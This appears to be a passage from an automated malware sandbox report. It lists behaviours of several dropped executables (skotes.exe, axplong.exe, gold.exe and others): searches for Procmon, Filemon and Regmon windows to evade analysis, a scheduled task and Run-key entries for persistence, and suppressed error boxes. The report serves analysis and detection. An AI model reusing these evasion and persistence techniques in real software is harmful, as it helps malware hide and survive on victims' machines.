                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: Filemonclass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: Filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: Filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: Filemonclass
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00E0F98E
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_00E81C41
                                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
